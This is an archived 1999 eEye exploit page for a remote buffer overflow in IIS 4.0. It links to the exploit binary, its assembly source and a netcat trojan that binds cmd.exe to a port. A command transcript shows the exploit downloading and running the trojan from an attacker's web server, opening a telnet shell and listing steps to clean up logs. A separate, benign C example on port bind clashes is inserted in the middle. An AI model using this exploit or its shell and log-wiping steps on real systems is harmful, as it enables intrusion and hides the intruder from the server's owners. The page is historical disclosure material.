retina.vs.iis4-round2-the.exploit.txt

🗓️ 17 Aug 1999 00:00:00 · Reported by eEye Digital Security · Type: packetstorm
🔗 packetstormsecurity.com

Exploit demonstrating a remote buffer overflow in IIS 4.0; the overflow downloads and executes a trojan on the server.

http://www.eeye.com/database/advisories/ad06081999/ad06081999-exploit.html  
  
  
Retina vs. IIS4, Round 2 - The Exploit  
  
We contemplated releasing this exploit and decided to do it.   
  
Here Is Why.  
  
We are a full disclosure security team, and we were not working under any non-  
disclosure agreement with anyone. Our responsibility to our clients and to the whole  
network community is to disclose as many details as possible. That is how other  
developers can pick up where we stopped and take the exploit in different  
directions, and it is how we contribute to the security community and keep  
software vendors working hard at producing more robust products. This exploit  
demonstrates the seriousness of the hole. YES, this is a very serious hole and it  
needs to be given the attention it deserves. If our team starts hiding the facts,  
we'll be no better than a software vendor that rushes insecure products to  
market. So here it goes...  
  
The Target:  
  
Let's say for this example we are targeting some random Fortune 500 company.  
Take your pick. We want to pretend this company has some "state of the art"  
security. They are locked down behind a Cisco PIX and are being watched with the  
best Intrusion Detection software. The server only accepts inbound connections  
to port 80.  
  
Let's Dance.  
  
We've crafted our exploit to overflow the remote machine and download and  
execute a trojan from our web server. The trojan we are using for this example is  
ncx.exe. Ncx.exe is a hacked-up version of netcat.exe: it always passes  
-l -p 80 -t -e cmd.exe as its arguments (listen on port 80, answer telnet  
negotiation, execute cmd.exe), which means it always binds cmd.exe to port 80.  
The exe has also been packed to make it smaller: instead of a 50k footprint it's  
31k. So we run our exploit:  
  
  
Downloads: iishack.exe <http://www.eeye.com/database/advisories/ad06081999/iishack.exe>  
iishack.asm <http://www.eeye.com/database/advisories/ad06081999/iishack.asm>  
ncx.exe (Port 80) <http://www.eeye.com/database/advisories/ad06081999/ncx.exe>  
ncx99.exe (Port 99) <http://www.eeye.com/database/advisories/ad06081999/ncx99.exe>  
  
We have had reports of people not being able to duplicate the exploit on their  
server. The reason is that ncx.exe is trying to bind to port 80 before  
inetinfo.exe has exited, so the bind fails. We have made another version of ncx  
that binds to port 99 (ncx99.exe), which avoids the problem. The exploit should  
work on any SP4 or SP5 machine. We have not tested against SP3 machines and would  
love to know if it works or not. Let us know. [email protected]  
  
  
X:\Code>iishack example.com 80 ourserver.com/ncx.exe  
------(IIS 4.0 remote buffer overflow exploit)-----------------  
(c) dark spyrit -- [email protected].  
http://www.eEye.com  
  
[usage: iishack <host> <port> <url> ]  
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe  
do not include 'http://' before hosts!  
---------------------------------------------------------------  
  
Data sent!  
  
Note: Give it enough time to download your trojan.  
  
X:\Code>telnet example.com 80  
  
Microsoft(R) Windows NT(TM)  
(C) Copyright 1985-1996 Microsoft Corp.  
  
C:\>[You have full access to the system, happy browsing :)]  
C:\>[Add a scheduled task to restart inetinfo in X minutes]  
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]  
C:\>[Clean up any trace or logs we might have left behind.]  
C:\>exit  
  
Note: Once we type exit in the telnet session our trojan exe, ncx.exe, is unloaded and is no longer listening on port  
80, so the web service can restart and everything can appear back to normal. The example above was a  
somewhat quick demonstration of how this could be used. Some things were left out because this advisory is big  
enough as it is.  
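The port clash behind the failure reports (ncx.exe binding port 80 before inetinfo.exe has released it) and the reason the web service can come back once the listener exits are shown in the following added example. It is not part of the eEye advisory and is not the code of iishack or ncx; it uses POSIX sockets on the loopback address and an ephemeral port instead of Windows sockets and port 80, so it runs unprivileged on any Unix-like host. The function names (try_bind, bind_with_retry, bound_port, demo_address_in_use) are hypothetical.

```c
/*
 * Added example, not eEye's code. Reproduces the failure mode from the
 * advisory with POSIX sockets: a second socket that tries to bind a port
 * still held by another socket (inetinfo.exe in the advisory, a plain
 * bound socket here) gets EADDRINUSE. eEye's workaround was a second
 * binary on port 99; the alternative shown here is to retry until the
 * first owner lets go. Ports are ephemeral, not 80, so no privileges
 * are needed.
 */
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <unistd.h>

/* Try once to bind a TCP socket to 127.0.0.1:port (0 = any free port).
 * Returns the socket fd on success, or -errno on failure (e.g. -EADDRINUSE).
 * SO_REUSEADDR is deliberately not set so the clash is visible. */
static int try_bind(unsigned short port) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -errno;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        int e = errno;
        close(fd);
        return -e;
    }
    return fd;
}

/* Retry the bind while the port is still in use, sleeping delay_ms between
 * attempts. Gives up after `attempts` tries or on any other error. */
static int bind_with_retry(unsigned short port, int attempts, int delay_ms) {
    for (int i = 0; i < attempts; i++) {
        int r = try_bind(port);
        if (r != -EADDRINUSE) return r;   /* bound, or an error retrying won't fix */
        struct timespec ts = { delay_ms / 1000, (delay_ms % 1000) * 1000000L };
        nanosleep(&ts, NULL);
    }
    return -EADDRINUSE;
}

/* Port number a bound socket actually received (useful after binding port 0). */
static unsigned short bound_port(int fd) {
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    if (getsockname(fd, (struct sockaddr *)&sa, &len) < 0) return 0;
    return ntohs(sa.sin_port);
}

/* Scenario from the advisory: the web server still holds the port, the
 * listener's first bind fails with EADDRINUSE, the web server exits, and a
 * retried bind succeeds. Returns 1 if exactly that sequence was observed. */
int demo_address_in_use(void) {
    int holder = try_bind(0);                  /* stand-in for inetinfo.exe */
    if (holder < 0) return 0;
    unsigned short port = bound_port(holder);
    if (port == 0) { close(holder); return 0; }

    int first = try_bind(port);                /* ncx.exe binding too early */
    int conflict = (first == -EADDRINUSE);
    if (first >= 0) close(first);

    close(holder);                             /* inetinfo.exe exits, port freed */
    int second = bind_with_retry(port, 5, 10); /* wait for the port instead of failing */
    int recovered = (second >= 0);
    if (second >= 0) close(second);

    return conflict && recovered;
}

int main(void) {
    printf("bind clash observed and resolved by retry: %s\n",
           demo_address_in_use() ? "yes" : "no");
    return 0;
}
```

Compile with `cc -std=c99 -o bindclash bindclash.c` and run. The same sequence is why the advisory's session ends by exiting the shell: once the listener closes its socket the port is free again and the scheduled restart of the web service can bind it. A defender watching for this should note that while the listener holds port 80 the service answering there is no longer speaking HTTP, which is what the Windows NT banner in the telnet session above shows.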
  
  
Special Thanks  
  
Goes to professor [email protected] for coding this exploit and demonstrating his  
Kung Fu style.  
  
Copyright (c) 1999 eEye Digital Security Team  
  
Permission is hereby granted for the redistribution of this alert   
electronically. It is not to be edited in any way without express consent of eEye. If  
you wish to reprint the whole or any part of this alert in any other medium  
excluding electronic medium, please e-mail [email protected] for permission.  
  
Disclaimer:  
  
The information within this paper may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There are NO  
warranties with regard to this information.   
In no event shall the author be liable for any damages whatsoever arising out of or  
in connection with the use or spread of this information. Any use of this  
information is at the user's own risk.  
  
Please send suggestions, updates, and comments to:   
  
eEye Digital Security Team  
  
[email protected]   
www.eEye.com   
  
Retina vs. IIS4, Round 2  
<http://www.eeye.com/database/advisories/ad06081999/ad06081999.html>  
Retina vs. IIS4, Round 2 - The Brain  
<http://www.eeye.com/database/advisories/ad06081999/ad06081999-brain.html>  
